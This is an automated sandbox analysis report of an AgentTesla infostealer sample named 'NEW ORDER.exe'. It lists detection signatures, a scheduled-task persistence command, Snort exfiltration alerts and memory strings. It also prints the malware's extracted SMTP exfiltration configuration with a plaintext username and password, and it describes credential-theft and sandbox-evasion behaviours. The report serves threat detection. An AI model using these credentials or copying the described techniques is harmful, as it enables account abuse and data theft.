Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW ORDER.exe

Overview

General Information

Sample Name:NEW ORDER.exe
Analysis ID:626340
MD5:2ab185544e86862dab6a5e7a4413c49f
SHA1:695efe1081e5b65894132e870f882b587ad4dfce
SHA256:ae376c158f4f8a123ca19b3fe6c96a158c8f7f88257cf07de7987b33d376acb2
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • NEW ORDER.exe (PID: 7016 cmdline: "C:\Users\user\Desktop\NEW ORDER.exe" MD5: 2AB185544E86862DAB6A5E7A4413C49F)
    • schtasks.exe (PID: 7120 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IrUpgWwdRBJK" /XML "C:\Users\user\AppData\Local\Temp\tmp354B.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • NEW ORDER.exe (PID: 3968 cmdline: {path} MD5: 2AB185544E86862DAB6A5E7A4413C49F)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "whford@focuzauto.com", "Password": "Gdn4ford@2016", "Host": "mail.focuzauto.com"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.486980862.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000000.486980862.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000003.00000002.698717283.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.NEW ORDER.exe.376bf08.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.NEW ORDER.exe.376bf08.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.NEW ORDER.exe.376bf08.4.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30bd9:$s10: logins
                • 0x30646:$s11: credential
                • 0x2ccac:$g1: get_Clipboard
                • 0x2ccba:$g2: get_Keyboard
                • 0x2ccc7:$g3: get_Password
                • 0x2df77:$g4: get_CtrlKeyDown
                • 0x2df87:$g5: get_ShiftKeyDown
                • 0x2df98:$g6: get_AltKeyDown
                3.0.NEW ORDER.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.0.NEW ORDER.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 20 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.5166.62.10.145497835872030171 05/13/22-21:33:25.240893
                    SID:2030171
                    Source Port:49783
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.5166.62.10.145497835872840032 05/13/22-21:33:25.240991
                    SID:2840032
                    Source Port:49783
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.5166.62.10.145497835872839723 05/13/22-21:33:25.240893
                    SID:2839723
                    Source Port:49783
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 3.0.NEW ORDER.exe.400000.6.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "whford@focuzauto.com", "Password": "Gdn4ford@2016", "Host": "mail.focuzauto.com"}
                    Multi AV Scanner detection for submitted file
                    Source: NEW ORDER.exeVirustotal: Detection: 37%Perma Link
                    Source: NEW ORDER.exeReversingLabs: Detection: 41%
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\IrUpgWwdRBJK.exeReversingLabs: Detection: 41%
                    Machine Learning detection for sample
                    Source: NEW ORDER.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\IrUpgWwdRBJK.exeJoe Sandbox ML: detected
                    Source: 3.0.NEW ORDER.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 3.0.NEW ORDER.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 3.0.NEW ORDER.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 3.2.NEW ORDER.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 3.0.NEW ORDER.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 3.0.NEW ORDER.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: NEW ORDER.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: NEW ORDER.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49783 -> 166.62.10.145:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49783 -> 166.62.10.145:587
                    Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49783 -> 166.62.10.145:587
                    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                    Source: global trafficTCP traffic: 192.168.2.5:49783 -> 166.62.10.145:587
                    Source: global trafficTCP traffic: 192.168.2.5:49783 -> 166.62.10.145:587
                    Source: NEW ORDER.exe, 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: NEW ORDER.exe, 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: NEW ORDER.exe, 00000003.00000002.705613036.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.focuzauto.com
                    Source: NEW ORDER.exe, 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nSfkEw.com
                    Source: NEW ORDER.exe, 00000000.00000002.491114236.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.509460420.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com%
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: NEW ORDER.exe, 00000000.00000003.449795160.00000000055D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: NEW ORDER.exe, 00000000.00000003.449593906.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.449121587.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comFf
                    Source: NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
                    Source: NEW ORDER.exe, 00000000.00000002.509460420.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comasva
                    Source: NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom
                    Source: NEW ORDER.exe, 00000000.00000003.449593906.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.449121587.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
                    Source: NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comessedm
                    Source: NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
                    Source: NEW ORDER.exe, 00000000.00000002.509460420.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commA
                    Source: NEW ORDER.exe, 00000000.00000003.449121587.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
                    Source: NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
                    Source: NEW ORDER.exe, 00000000.00000003.449593906.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.449121587.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtoo_
                    Source: NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: NEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438817122.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438727968.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438654430.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comc
                    Source: NEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comic
                    Source: NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comn
                    Source: NEW ORDER.exe, 00000000.00000003.442354972.00000000055A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.c
                    Source: NEW ORDER.exe, 00000000.00000003.442035271.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.442016798.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.442354972.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.442490931.00000000055AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: NEW ORDER.exe, 00000000.00000003.442354972.00000000055A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: NEW ORDER.exe, 00000000.00000003.442016798.00000000055DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnt-bz
                    Source: NEW ORDER.exe, 00000000.00000003.442016798.00000000055DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnu-e
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: NEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438211868.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438422766.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438358460.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438304023.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438259990.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438397273.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: NEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438211868.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438422766.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438358460.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438304023.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438259990.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438397273.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438640795.00000000055C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
                    Source: NEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438211868.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438422766.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438358460.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438304023.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438727968.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438654430.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438259990.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438397273.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comuctT/
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: NEW ORDER.exe, 00000000.00000003.440601923.00000000055A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krF
                    Source: NEW ORDER.exe, 00000000.00000003.440601923.00000000055A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kre
                    Source: NEW ORDER.exe, 00000000.00000003.440601923.00000000055A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krm
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.439415514.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.439273001.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.439377058.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.439307136.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: NEW ORDER.exe, 00000000.00000003.439377058.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comc
                    Source: NEW ORDER.exe, 00000000.00000003.439307136.00000000055BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comtn
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                    Source: NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de/
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: NEW ORDER.exe, 00000003.00000002.705598159.0000000002DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uLakVAQ46zx.org
                    Source: NEW ORDER.exe, 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownDNS traffic detected: queries for: mail.focuzauto.com

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.NEW ORDER.exe.376bf08.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 3.0.NEW ORDER.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 3.0.NEW ORDER.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 3.0.NEW ORDER.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 3.2.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.NEW ORDER.exe.2654f00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 3.0.NEW ORDER.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 3.0.NEW ORDER.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.NEW ORDER.exe.376bf08.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: NEW ORDER.exe
                    .NET source code contains very large array initializations
                    Source: 3.0.NEW ORDER.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007bE1F2EB0Bu002d2E3Au002d45E5u002dA578u002d890AA9A1AD1Fu007d/F25CEFDAu002d126Cu002d46E6u002dBEF3u002d1D7F6108EC88.csLarge array initialization: .cctor: array initializer size 11616
                    Source: 3.0.NEW ORDER.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007bE1F2EB0Bu002d2E3Au002d45E5u002dA578u002d890AA9A1AD1Fu007d/F25CEFDAu002d126Cu002d46E6u002dBEF3u002d1D7F6108EC88.csLarge array initialization: .cctor: array initializer size 11616
                    Source: 3.0.NEW ORDER.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007bE1F2EB0Bu002d2E3Au002d45E5u002dA578u002d890AA9A1AD1Fu007d/F25CEFDAu002d126Cu002d46E6u002dBEF3u002d1D7F6108EC88.csLarge array initialization: .cctor: array initializer size 11616
                    Source: 3.2.NEW ORDER.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE1F2EB0Bu002d2E3Au002d45E5u002dA578u002d890AA9A1AD1Fu007d/F25CEFDAu002d126Cu002d46E6u002dBEF3u002d1D7F6108EC88.csLarge array initialization: .cctor: array initializer size 11616
                    Source: NEW ORDER.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 0.2.NEW ORDER.exe.376bf08.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 3.0.NEW ORDER.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 3.0.NEW ORDER.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 3.0.NEW ORDER.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 3.2.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.NEW ORDER.exe.2654f00.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 3.0.NEW ORDER.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 3.0.NEW ORDER.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.NEW ORDER.exe.376bf08.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_04B7E580
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_04B7E570
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_04B7BCF4
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_05692FB0
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_05690E30
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_0569D950
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_0569F938
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_0569E0A8
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_0569EAE0
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_00302050
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_028DF080
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_028DF3C8
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_05C6C460
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_05C6B710
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_05C69248
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_05C60040
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_006F2050
                    Source: NEW ORDER.exeBinary or memory string: OriginalFilename vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelcEMFcmuWHYdtRtSGZcssuRBY.exe4 vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename73tNI.exe8 vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000000.00000002.491114236.0000000002611000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000000.00000002.491114236.0000000002611000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelcEMFcmuWHYdtRtSGZcssuRBY.exe4 vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000000.00000002.513667660.0000000007120000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
